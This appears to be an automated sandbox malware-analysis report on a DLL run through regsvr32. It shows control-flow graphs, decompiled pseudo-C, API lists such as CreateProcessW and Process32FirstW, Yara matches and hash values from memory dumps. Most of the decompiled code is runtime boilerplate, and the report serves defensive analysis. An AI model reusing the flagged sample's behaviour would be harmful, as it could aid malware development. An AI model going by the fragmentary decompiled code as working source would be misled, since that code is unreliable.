                                                                                                          • Not Executed
                                                                                                          control_flow_graph 341 c88bc8-c88c26 call c99f38 344 c88c2b-c88c30 341->344 345 c88e8a-c88e9a call c82c08 344->345 346 c88c36-c88c3b 344->346 353 c88e9c-c88ea1 345->353 354 c88ea6 345->354 348 c88e7b-c88e85 346->348 349 c88c41-c88c43 346->349 348->344 351 c88eb8-c88f90 call c9c2c0 349->351 352 c88c49-c88c4e 349->352 362 c88f95-c88fad 351->362 355 c88d71-c88e5f call c952c0 352->355 356 c88c54-c88c59 352->356 353->344 361 c88ea8-c88ead 354->361 363 c88e64-c88e6b 355->363 359 c88c5f-c88c64 356->359 360 c88d10-c88d6a call c98d60 356->360 359->361 364 c88c6a-c88cfb call c9bf94 359->364 369 c88d6f Process32FirstW 360->369 361->362 365 c88eb3 361->365 363->362 367 c88e71-c88e76 363->367 370 c88d00-c88d0b 364->370 365->344 367->344 369->355 370->344
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .f$M$N5
                                                                                                          • API String ID: 0-1477915503
                                                                                                          • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                          • Instruction ID: 9f5e38ee6962528dea48256f6b90bbf59acf975329ab5bd46df7cb1e2c7fe8ec
                                                                                                          • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                          • Instruction Fuzzy Hash: 15A183701197449FD7A8DF28C8C959EBBF0FB94308F905A1DF8869B2A0CB74D949CB46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 459 c98fc8-c98ff9 call c99f38 462 c99000 459->462 463 c99005-c9900b 462->463 464 c99011-c99017 463->464 465 c99354-c993f0 call c9464c 463->465 467 c9901d-c99023 464->467 468 c99134-c99235 call c9eac0 call ca1684 464->468 473 c993f5 465->473 470 c99029-c9902b 467->470 471 c9912a-c9912f 467->471 481 c9923a-c9934f call c887dc 468->481 474 c993fa-c99400 470->474 475 c99031-c99125 call c949b0 470->475 471->463 473->474 474->463 477 c99406-c99421 474->477 475->462 481->473
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: A]jN
                                                                                                          • API String ID: 0-1761522205
                                                                                                          • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                          • Instruction ID: a572e9fe3ec5769ce1d23a8758111c201ec10818e7b5e84be2bf4d9705ac10d1
                                                                                                          • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                          • Instruction Fuzzy Hash: 74D1E4B1D0060A8FDF48DFA8C48A4AEBBB1FB58304F10422DD516BB290D7785A46CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: C
                                                                                                          • API String ID: 0-3705061908
                                                                                                          • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                          • Instruction ID: c75c1c16685aa88ce6106a562ce3481e432c6f119dc66ade3e6e22ff39471351
                                                                                                          • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                          • Instruction Fuzzy Hash: DC61E07151C7848BD768DF28C18A40FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 134 18000147c-180001482 135 180001484-180001487 134->135 136 1800014bd-1800014c7 134->136 137 1800014b1-1800014f0 call 180001268 135->137 138 180001489-18000148c 135->138 139 1800015e4-1800015f9 136->139 157 1800014f6-18000150b call 1800010fc 137->157 158 1800015be 137->158 140 1800014a4 __scrt_dllmain_crt_thread_attach 138->140 141 18000148e-180001491 138->141 142 180001608-180001622 call 1800010fc 139->142 143 1800015fb 139->143 149 1800014a9-1800014b0 140->149 145 180001493-18000149c 141->145 146 18000149d-1800014a2 call 1800011ac 141->146 155 180001624-180001659 call 180001224 call 180001e54 call 180001ed0 call 1800013d8 call 1800013fc call 180001254 142->155 156 18000165b-18000168c call 180001c48 142->156 147 1800015fd-180001607 143->147 146->149 155->147 168 18000169d-1800016a3 156->168 169 18000168e-180001694 156->169 166 180001511-180001522 call 18000116c 157->166 167 1800015d6-1800015e3 call 180001c48 157->167 161 1800015c0-1800015d5 158->161 184 180001573-18000157d call 1800013d8 166->184 185 180001524-180001548 call 180001e94 call 180001e44 call 180001e70 call 180006da0 166->185 167->139 174 1800016a5-1800016af 168->174 175 1800016ea-1800016f2 call 180010ac0 168->175 169->168 173 180001696-180001698 169->173 180 18000178b-180001798 173->180 181 1800016b1-1800016b9 174->181 182 1800016bb-1800016c9 174->182 186 1800016f7-180001700 175->186 187 1800016cf-1800016d7 call 18000147c 181->187 182->187 196 180001781-180001789 182->196 184->158 206 18000157f-18000158b call 180001e8c 184->206 185->184 234 18000154a-180001551 __scrt_dllmain_after_initialize_c 185->234 192 180001702-180001704 186->192 193 180001738-18000173a 186->193 198 1800016dc-1800016e4 187->198 192->193 201 180001706-180001728 call 180010ac0 call 1800015e4 192->201 202 180001741-180001756 call 18000147c 193->202 203 18000173c-18000173f 193->203 196->180 198->175 198->196 201->193 229 18000172a-18000172f 201->229 202->196 216 180001758-180001762 202->216 203->196 203->202 223 1800015b1-1800015bc 206->223 224 18000158d-180001597 call 180001340 206->224 221 180001764-18000176b 216->221 222 18000176d-18000177d 216->222 221->196 222->196 223->161 224->223 233 180001599-1800015a7 224->233 229->193 233->223 234->184 235 180001553-180001570 call 180006d5c 234->235 235->184
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0000000118000147C(void* __edx) {
                                                                                                          				void* _t5;
                                                                                                          
                                                                                                          				_t5 = __edx;
                                                                                                          				if (_t5 == 0) goto 0x800014bd;
                                                                                                          				if (_t5 == 0) goto 0x800014b1;
                                                                                                          				if (_t5 == 0) goto 0x800014a4;
                                                                                                          				if (__edx == 1) goto 0x8000149d;
                                                                                                          				return 1;
                                                                                                          			}




                                                                                                          0x180001480
                                                                                                          0x180001482
                                                                                                          0x180001487
                                                                                                          0x18000148c
                                                                                                          0x180001491
                                                                                                          0x18000149c

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 190073905-0
                                                                                                          • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                          • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                                          • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                          • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 71%
                                                                                                          			E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                                                                                                          				long long _v56;
                                                                                                          				void* __rdi;
                                                                                                          				void* __rsi;
                                                                                                          				void* __rbp;
                                                                                                          				void* _t31;
                                                                                                          				intOrPtr _t37;
                                                                                                          				void* _t50;
                                                                                                          				intOrPtr* _t67;
                                                                                                          				long long _t73;
                                                                                                          				void* _t75;
                                                                                                          				long long _t89;
                                                                                                          				signed int _t90;
                                                                                                          				void* _t91;
                                                                                                          				intOrPtr* _t92;
                                                                                                          				void* _t95;
                                                                                                          				void* _t98;
                                                                                                          
                                                                                                          				_t98 = __r8;
                                                                                                          				_t75 = __rcx;
                                                                                                          				_a8 = __rbx;
                                                                                                          				r14d = __ecx;
                                                                                                          				if (__ecx == 0) goto 0x8000653f;
                                                                                                          				_t2 = _t75 - 1; // -1
                                                                                                          				if (_t2 - 1 <= 0) goto 0x8000640a;
                                                                                                          				E000000011800086F4(_t2 - 1, __rax);
                                                                                                          				_t3 = _t90 + 0x16; // 0x16
                                                                                                          				 *__rax = _t3;
                                                                                                          				E000000011800085B8();
                                                                                                          				goto 0x8000653f;
                                                                                                          				E00000001180009CD8(_t50, __rbx, _t91);
                                                                                                          				r8d = 0x104;
                                                                                                          				E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
                                                                                                          				_t92 =  *0x80022630; // 0xaf3350
                                                                                                          				 *0x80022610 = 0x80022250;
                                                                                                          				if (_t92 == 0) goto 0x8000643e;
                                                                                                          				if ( *_t92 != dil) goto 0x80006441;
                                                                                                          				_t67 =  &_a32;
                                                                                                          				_a24 = _t90;
                                                                                                          				_v56 = _t67;
                                                                                                          				r8d = 0;
                                                                                                          				_a32 = _t90;
                                                                                                          				_t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
                                                                                                          				r8d = 1;
                                                                                                          				E0000000118000636C(_t31, _a24, _a32, _t98); // executed
                                                                                                          				_t73 = _t67;
                                                                                                          				if (_t67 != 0) goto 0x80006499;
                                                                                                          				E000000011800086F4(_t67, _t67);
                                                                                                          				 *_t67 = 0xc;
                                                                                                          				E0000000118000878C(_t67, _a24);
                                                                                                          				goto 0x80006403;
                                                                                                          				_v56 =  &_a32;
                                                                                                          				E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
                                                                                                          				if (r14d != 1) goto 0x800064d1;
                                                                                                          				_t37 = _a24 - 1;
                                                                                                          				 *0x80022620 = _t73;
                                                                                                          				 *0x80022618 = _t37;
                                                                                                          				goto 0x8000653a;
                                                                                                          				_a16 = _t90;
                                                                                                          				0x80009298();
                                                                                                          				if (_t37 == 0) goto 0x80006500;
                                                                                                          				E0000000118000878C( &_a32, _a16);
                                                                                                          				_a16 = _t90;
                                                                                                          				E0000000118000878C( &_a32, _t73);
                                                                                                          				goto 0x8000653f;
                                                                                                          				_t89 = _a16;
                                                                                                          				if ( *_t89 == _t90) goto 0x8000651b;
                                                                                                          				if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
                                                                                                          				 *0x80022618 = 0;
                                                                                                          				_a16 = _t90;
                                                                                                          				 *0x80022620 = _t89;
                                                                                                          				E0000000118000878C(_t89 + 8, _t90 + 1);
                                                                                                          				_a16 = _t90;
                                                                                                          				E0000000118000878C(_t89 + 8, _t73);
                                                                                                          				return _t37;
                                                                                                          			}



















                                                                                                          0x1800063cc
                                                                                                          0x1800063cc
                                                                                                          0x1800063cc
                                                                                                          0x1800063e1
                                                                                                          0x1800063e6
                                                                                                          0x1800063ec
                                                                                                          0x1800063f2
                                                                                                          0x1800063f4
                                                                                                          0x1800063f9
                                                                                                          0x1800063fc
                                                                                                          0x1800063fe
                                                                                                          0x180006405
                                                                                                          0x18000640a
                                                                                                          0x180006416
                                                                                                          0x180006421
                                                                                                          0x180006426
                                                                                                          0x18000642d
                                                                                                          0x180006437
                                                                                                          0x18000643c
                                                                                                          0x180006441
                                                                                                          0x180006445
                                                                                                          0x18000644d
                                                                                                          0x180006452
                                                                                                          0x180006455
                                                                                                          0x18000645e
                                                                                                          0x180006467
                                                                                                          0x180006474
                                                                                                          0x180006479
                                                                                                          0x18000647f
                                                                                                          0x180006481
                                                                                                          0x18000648d
                                                                                                          0x18000648f
                                                                                                          0x180006494
                                                                                                          0x1800064ab
                                                                                                          0x1800064b0
                                                                                                          0x1800064b9
                                                                                                          0x1800064be
                                                                                                          0x1800064c0
                                                                                                          0x1800064c7
                                                                                                          0x1800064cf
                                                                                                          0x1800064d5
                                                                                                          0x1800064dc
                                                                                                          0x1800064e5
                                                                                                          0x1800064eb
                                                                                                          0x1800064f3
                                                                                                          0x1800064f7
                                                                                                          0x1800064fe
                                                                                                          0x180006500
                                                                                                          0x18000650d
                                                                                                          0x180006519
                                                                                                          0x18000651b
                                                                                                          0x180006523
                                                                                                          0x180006527
                                                                                                          0x18000652e
                                                                                                          0x180006536
                                                                                                          0x18000653a
                                                                                                          0x180006551

                                                                                                          APIs
                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE
                                                                                                            • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
                                                                                                            • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                                                                                          • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                          • API String ID: 2724796048-464481000
                                                                                                          • Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                          • Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
                                                                                                          • Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                          • Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 415 c93988-c93a3e call c99f38 418 c93acc-c93b12 CreateProcessW 415->418 419 c93a44-c93ac6 call c8a940 415->419 419->418
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID: li
                                                                                                          • API String ID: 963392458-3170889640
                                                                                                          • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                          • Instruction ID: ac90a880bd77d847c884c0b7a93c441ca0ec957bde6cb7bd98c2f3abf1214f57
                                                                                                          • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                          • Instruction Fuzzy Hash: 7441E77091C7848FDB64DF18D0C979AB7E0FB98315F10495DE488C7295CB789884CB86
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 422 18000d26c-18000d289 423 18000d2b4-18000d2c1 call 180008160 422->423 424 18000d28b-18000d29c call 1800086f4 call 1800085b8 422->424 429 18000d2c7-18000d2ce 423->429 437 18000d29e-18000d2b3 424->437 431 18000d306-18000d312 call 1800081b4 429->431 432 18000d2d0-18000d2db 429->432 431->437 434 18000d2dd 432->434 435 18000d2df call 18000d174 432->435 438 18000d301-18000d304 434->438 441 18000d2e4-18000d2eb 435->441 438->429 442 18000d2f2-18000d2fb 441->442 443 18000d2ed-18000d2f0 441->443 442->438 443->431
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                          
                                                                                                          				_a8 = __rbx;
                                                                                                          				_a16 = __rsi;
                                                                                                          				_a24 = __rdi;
                                                                                                          				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
                                                                                                          				E000000011800086F4(__ecx - 0x2000, __rax);
                                                                                                          				 *__rax = 9;
                                                                                                          				E000000011800085B8();
                                                                                                          				return 9;
                                                                                                          			}



                                                                                                          0x18000d26c
                                                                                                          0x18000d271
                                                                                                          0x18000d276
                                                                                                          0x18000d289
                                                                                                          0x18000d28b
                                                                                                          0x18000d295
                                                                                                          0x18000d297
                                                                                                          0x18000d2b3

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215553584-0
                                                                                                          • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                          • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                          • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                          • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 444 180008714-180008723 445 180008733-180008743 444->445 446 180008725-180008731 444->446 448 18000875a-180008772 RtlAllocateHeap 445->448 446->445 447 180008776-180008781 call 1800086f4 446->447 452 180008783-180008788 447->452 449 180008774 448->449 450 180008745-18000874c call 18000c08c 448->450 449->452 450->447 456 18000874e-180008758 call 18000abf8 450->456 456->447 456->448
                                                                                                          C-Code - Quality: 44%
                                                                                                          			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                          				void* __rbx;
                                                                                                          				intOrPtr* _t22;
                                                                                                          				signed int _t29;
                                                                                                          
                                                                                                          				_t29 = __rdx;
                                                                                                          				if (__rcx == 0) goto 0x80008733;
                                                                                                          				_t1 = _t29 - 0x20; // -32
                                                                                                          				_t22 = _t1;
                                                                                                          				if (_t22 - __rdx < 0) goto 0x80008776;
                                                                                                          				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                          				goto 0x8000875a;
                                                                                                          				if (E0000000118000C08C() == 0) goto 0x80008776;
                                                                                                          				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
                                                                                                          				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                          				if (_t22 == 0) goto 0x80008745;
                                                                                                          				goto 0x80008783;
                                                                                                          				E000000011800086F4(_t22, _t22);
                                                                                                          				 *_t22 = 0xc;
                                                                                                          				return 0;
                                                                                                          			}






                                                                                                          0x180008714
                                                                                                          0x180008723
                                                                                                          0x180008727
                                                                                                          0x180008727
                                                                                                          0x180008731
                                                                                                          0x18000873f
                                                                                                          0x180008743
                                                                                                          0x18000874c
                                                                                                          0x180008758
                                                                                                          0x180008769
                                                                                                          0x180008772
                                                                                                          0x180008774
                                                                                                          0x180008776
                                                                                                          0x18000877b
                                                                                                          0x180008788

                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000268A0197523D,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                          • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                          • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                          • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 71%
                                                                                                          			E00000001180001268(void* __ecx) {
                                                                                                          				void* __rbx;
                                                                                                          				void* _t12;
                                                                                                          				void* _t17;
                                                                                                          				void* _t18;
                                                                                                          				void* _t19;
                                                                                                          				void* _t20;
                                                                                                          				void* _t21;
                                                                                                          
                                                                                                          				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                          				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                          				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
                                                                                                          				if (E00000001180002A08() != 0) goto 0x80001297;
                                                                                                          				goto 0x800012ab; // executed
                                                                                                          				E00000001180006CDC(_t17); // executed
                                                                                                          				if (0 != 0) goto 0x800012a9;
                                                                                                          				E00000001180002A58(0);
                                                                                                          				goto 0x80001293;
                                                                                                          				return 1;
                                                                                                          			}










                                                                                                          0x18000127c
                                                                                                          0x18000127f
                                                                                                          0x180001285
                                                                                                          0x180001291
                                                                                                          0x180001295
                                                                                                          0x180001297
                                                                                                          0x18000129e
                                                                                                          0x1800012a2
                                                                                                          0x1800012a7
                                                                                                          0x1800012b0

                                                                                                          APIs
                                                                                                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                            • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                          • String ID:
                                                                                                          • API String ID: 108617051-0
                                                                                                          • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                          • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                          • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                          • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString$ExitProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 80118013-0
                                                                                                          • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                          • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                          • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                          • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastShowWindow
                                                                                                          • String ID:
